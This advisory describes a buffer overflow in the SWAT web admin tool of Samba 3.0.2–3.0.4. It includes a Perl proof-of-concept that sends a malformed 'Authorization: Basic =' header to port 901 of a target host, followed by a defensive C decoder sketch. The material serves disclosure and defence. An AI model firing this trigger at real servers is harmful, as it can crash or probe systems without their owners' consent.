Affected system
Samba 3.0.2
Samba 3.0.3
Samba 3.0.4
Detailed Description
SWAT is Samba's web management tool. The Samba SWAT service has a buffer overflow issue that remote attackers can use to execute arbitrary instructions on the system. The problem is in the base64_decode_data_blob function in the source/lib/util_str.c file, which is used when handling HTTP Basic authentication.

Test code

#!/usr/bin/perl
# Samba 3.0.4 and prior's SWAT Authorization Buffer Overflow
# Created by Noam Rathaus of Beyond Security Ltd.

use strict;
use IO::Socket;

# Target host is taken from the first command-line argument
my $host = $ARGV[0];

# SWAT listens on TCP port 901
my $remote = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => "901");
unless ($remote) { die "cannot connect to $host:901\n"; }
print "connected\n";

$remote->autoflush(1);

# Request whose Basic credential is the single character "="
my $http = "GET / HTTP/1.1\r\n" .
    "Host: $host:901\r\n" .
    "User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040712 Firefox/0.9.1\r\n" .
    "Accept: text/xml\r\n" .
    "Accept-Language: en-us,en;q=0.5\r\n" .
    "Accept-Encoding: gzip,deflate\r\n" .
    "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" .
    "Keep-Alive: 300\r\n" .
    "Connection: keep-alive\r\n" .
    "Authorization: Basic =\r\n" .
    "\r\n";

print "HTTP: [$http]\n";
print $remote $http;
sleep(1);
print "Sent\n";

# Print whatever the server sends back
while (<$remote>) {
    print $_;
}
print "\n";

close $remote;
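
The test code above sends a Basic credential consisting only of "=". As an added example (not Samba's code and not the Samba fix), the following C sketch shows a strict, bounds-checked decoder for that credential which rejects such malformed input and checks the output size before writing anything; the names basic_cred_decode and b64_val are hypothetical.

```c
#include <stdio.h>
#include <string.h>

/* Value of one base64 alphabet character, or -1 if it is not in the alphabet. */
static int b64_val(unsigned char c)
{
    static const char tbl[] =
        "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    const char *p = c ? strchr(tbl, c) : NULL;
    return p ? (int)(p - tbl) : -1;
}

/* Strictly decode the <b64> part of "Authorization: Basic <b64>" into out[cap].
 * Returns the decoded length, or -1 if the input is malformed or too large. */
long basic_cred_decode(const char *in, unsigned char *out, size_t cap)
{
    size_t len = strlen(in), pad, o = 0;
    if (len == 0 || len % 4 != 0)
        return -1;                      /* rejects "", "=", "abc", ... */
    pad = (size_t)(in[len - 1] == '=') + (size_t)(in[len - 2] == '=');
    if ((len / 4) * 3 - pad > cap)
        return -1;                      /* size check before any write */
    for (size_t i = 0; i < len; i += 4) {
        int last = (i + 4 == len);
        unsigned long v = 0;
        for (size_t j = 0; j < 4; j++) {
            int d = b64_val((unsigned char)in[i + j]);
            /* '=' is legal only as trailing padding of the last group */
            if (d < 0 && !(last && j >= 4 - pad && in[i + j] == '='))
                return -1;
            v = (v << 6) | (unsigned long)(d < 0 ? 0 : d);
        }
        /* in a padded group, the bits that produce no output byte must be 0 */
        if (last && pad && (v & ((1UL << (8 * pad)) - 1)))
            return -1;
        for (size_t k = 0; k < (last ? 3 - pad : 3); k++)
            out[o++] = (unsigned char)(v >> (16 - 8 * k));
    }
    return (long)o;
}

int main(void)
{
    unsigned char buf[64];  /* constructed inputs: a lone "=" and a valid value */
    printf("%ld %ld\n", basic_cred_decode("=", buf, sizeof buf),
           basic_cred_decode("dXNlcjpwYXNz", buf, sizeof buf));
    return 0;
}
```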